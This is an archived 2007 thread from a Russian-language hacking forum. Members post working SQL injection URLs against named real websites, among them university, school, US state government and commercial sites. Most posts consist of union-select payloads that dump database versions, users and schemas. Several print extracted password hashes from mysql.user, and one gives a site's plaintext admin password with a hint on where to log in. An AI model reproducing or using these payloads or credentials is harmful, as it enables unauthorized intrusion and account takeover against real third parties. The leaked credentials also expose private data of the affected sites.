ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
29.05.2007, 09:53
|
|
Участник форума
Регистрация: 06.10.2006
Сообщений: 226
Провел на форуме:
3025546
Репутация:
1327
|
|
Сообщение от NOmeR1
Смотрим название картинки 
Код:
http://cemcom.infosci.cornell.edu/projects.php?pid=-12+union+select+USER(),2/*
http://cemcom.infosci.cornell.edu/projects.php?pid=-12+union+select+VERSION(),2/*
http://cemcom.infosci.cornell.edu/projects.php?pid=-12+union+select+DATABASE(),2/*
Пароль от ROOT (хеш)
Код:
http://cemcom.infosci.cornell.edu/projects.php?pid=-12+union+select+user,2+from+mysql.user/*
http://cemcom.infosci.cornell.edu/projects.php?pid=-12+union+select+password,2+from+mysql.user/*
во первых пиши все одним запросом, почитай про concat(), во вторых твой запрос не верен, он должен быть вот таким
Код:
http://cemcom.infosci.cornell.edu/projects.php?pid=-12+union+select+1,2,concat(user,char(58),password),4,5,6,7,8,9,10+from+mysql.user/*
root:1fc1948a4f4019c6
root:
:
wordpress:4c939e2e4400bf8a
wiki:368560a9410169b5
phpbb2:77c86717526fcef9
phpesp:723444a11c4122af
iocrew:60bb08ca538d775c
liverank:0991050a06133626
356forum:1c3c515b47e848a9
forum:0f0dbe0300330c1b
wikiuser:1fc1948a4f4019c6
|
|
|
29.05.2007, 11:19
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734
Репутация:
1917
|
|
Сообщение от NOmeR1
http://silverchips.mbhs.edu/module/poll/pollcomment.php?pid=-176+union+select+USER()/*
http://silverchips.mbhs.edu/module/poll/pollcomment.php?pid=-176+union+select+VERSION()/*
http://silverchips.mbhs.edu/module/poll/pollcomment.php?pid=-176+union+select+DATABASE()/*
там 5 мускул
http://silverchips.mbhs.edu/module/poll/pollcomment.php?pid=176+union+select+concat(table_ name,0x3a,column_name)%20from%20INFORMATION_SCHEMA .columns/*
вот схема:
Код:
aimresponses
--search
--reply
--link
--conditions
benhelp
--toline
--fromline
--subject
--cc
--message
--date
--owner
calendar
--type
--name
--description
classaides
--aide
classannc
--text
--time
classes
--title
--teacher
--room
--department
--period
--semester
--classtime
--description
--fallyear
classsched
--sid
--name
--comment
--assndate
--assntype
--block
--instime
comments
--cid
--uname
--time
--comment
coursedisc
--discid
directory
--streetadd
--city
--stateprov
--zip
--phone
--email
--homepage
--message
discussions
--title
--type
--subtype
--description
--time
--hits
--prevdiscid
files
--action
--contents
groupmembers
--uname
groups
links
--slave
maliasDB
--username
--oneway
parentlinks
--student
passwd
--passwd
peoplelinks
--friend
prefs
--title
--fnamecfg
--mnamecfg
--cols
--fileexpert
--commanderror
registrations
--fname
--lname
--mname
--type
--email
--streetadd
--city
--stateprov
--zip
--phone
--students
--uname
--owner
--status
scheds
--semester
--id
--fallyear
userinfo
--fname
--lname
--mname
--id
--grp
--class
--permissions
--lastlogin
--lastip
__________________
Карфаген должен быть разрушен...
Последний раз редактировалось Scipio; 29.05.2007 в 11:25..
|
|
|
|
29.05.2007, 12:13
|
|
Постоянный
Регистрация: 03.02.2007
Сообщений: 520
Провел на форуме:
1777536
Репутация:
932
|
|
Код:
http://www.razvitie.su/news.php?id=-116+union+select+1,version(),3,4/*
http://www.nukuteater.ee/news.php?news_id=-60+union+select+1,2,version(),4,5,6/*
|
|
|
|
29.05.2007, 13:41
|
|
Новичок
Регистрация: 28.05.2007
Сообщений: 13
Провел на форуме:
17665
Репутация:
23
|
|
www.maineservicecommission.gov
Код:
http://www.maineservicecommission.gov/news/release.php?ID=-1+union+select+1,2,version(),user(),database(),6,7,8,9,10,11,12/*
www.tam.ca.gov
Код:
http://www.tam.ca.gov/view.php?id=-1+union+select+1,2,concat(version(),0x3a,user()%20,0x3a,database()),4/*
Последний раз редактировалось Cond; 29.05.2007 в 15:01..
|
|
|
|
29.05.2007, 14:20
|
|
Постоянный
Регистрация: 03.02.2007
Сообщений: 520
Провел на форуме:
1777536
Репутация:
932
|
|
http://www.psat.wa.gov
Код:
http://www.psat.wa.gov/Publications/news_stories/hoodcanal_news_story.php?id=-131+union+select+concat(user(),version()),2,3,4,5,6,7,8/*
|
|
|
|
29.05.2007, 15:57
|
|
Постоянный
Регистрация: 21.04.2006
Сообщений: 540
Провел на форуме:
1310036
Репутация:
726
|
|
http://www.rudtp.ru/icc.php?id='+union+select+1,2,3,4,5,6,7,8,9,0,1,2, 3,4,5,6,7,8/*
http://www.cmbc.ru/courses.php?ID=-2'+union+select+1,2,concat(version(),0x3a,database ()),4/*
|
|
|
|
29.05.2007, 16:19
|
|
Участник форума
Регистрация: 20.04.2007
Сообщений: 174
Провел на форуме:
2310282
Репутация:
149
|
|
Код:
http://www.nero.com/eng/showpress.php?id=1'
13 столбцов.
Что-то у муну UNION не получаетца... |
|
|
|
29.05.2007, 17:11
|
|
Участник форума
Регистрация: 28.04.2007
Сообщений: 239
Провел на форуме:
2140476
Репутация:
161
|
|
SQL
Код HTML:
http://market.ya1.ru/market_search.php?search=%271%2C2%2C3%2C4%2F**%2F%3C%3F%2B%24www%3D%24_get%5B
Как дальше продолжуть я незнаю.Стоит фильтр.Всё перепробовал.Наверное это говорит о том что мало опыта в иследовании sql
Код HTML:
http://market.ya1.ru/market_search.php?search=%27union%2Bfrom%2Bselect%2Buser%2C2%2C3%27%2F*
так же нашел
Код HTML:
http://market.ya1.ru/market_search.php?search=12%2F**%2F%3C%3F%2B%24www%20%20%3D%24_get%5B%22.ru%22%5D%3B%3F%3E%3F%3E%3F%3E%3F%%20%203E%3F%3E%3F%3E%3F%3E%3F%3E%3F%3E%3F%3E%ED%E0%E2%E5%20%20%F0%ED%EE%E5+%E4%E0%ED%ED%EE%E5+%EC%EE%E6%ED%EE+%E%20%20A%E0%EA-%F2%EE+%E8%F1%EF%EE%EB%FC%E7%EE%E2%E0%F2%FC+%2C%F2%20%20%EE%EB%FC%EA%EE+%FF+%ED%E5%E7%ED%E0%FE+%EA%E0%EA+%%20%2029%29
последнее к sql не относиться, но как ипользовать не знаю
Последний раз редактировалось ultimatum; 29.05.2007 в 18:05..
|
|
|
|
29.05.2007, 19:56
|
|
Познающий
Регистрация: 31.01.2007
Сообщений: 88
Провел на форуме:
631013
Репутация:
453
|
|
GlooK
Он и не может получиться
Код:
http://www.nero.com/eng/showpress.php?id=1233+AND+ascii(lower(substring(Version(),1,1)))=51/*
3 версия
Код:
http://www.shejay.net/artistDetail.php?userID=2193%20and%201=-1%20union%20select%201,2,3,4,5,6,7,8,9,0,11,12,13,14,15,16,concat(username,char(58),password,char(58),email),18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33%20from%20users/*
admin:kellyshe
Логиниться на той же странице
Последний раз редактировалось kamaz; 29.05.2007 в 20:06..
|
|
|
|
29.05.2007, 20:45
|
|
Постоянный
Регистрация: 03.02.2007
Сообщений: 520
Провел на форуме:
1777536
Репутация:
932
|
|
...
Код:
http://www.ethanolrfa.org/resource/papers/view.php?id=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15/*
http://www.volunteermaine.org/news/release.php?ID=-251+union+select+1,2,concat(user(),version()),4,5,6,7,8,9,10,11,12/*
http://www.grrn.org/releases/release.php?rid=79&rhid=1&id=-10+union+select+1,concat(user(),version()),3,4,5,6,7/*
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
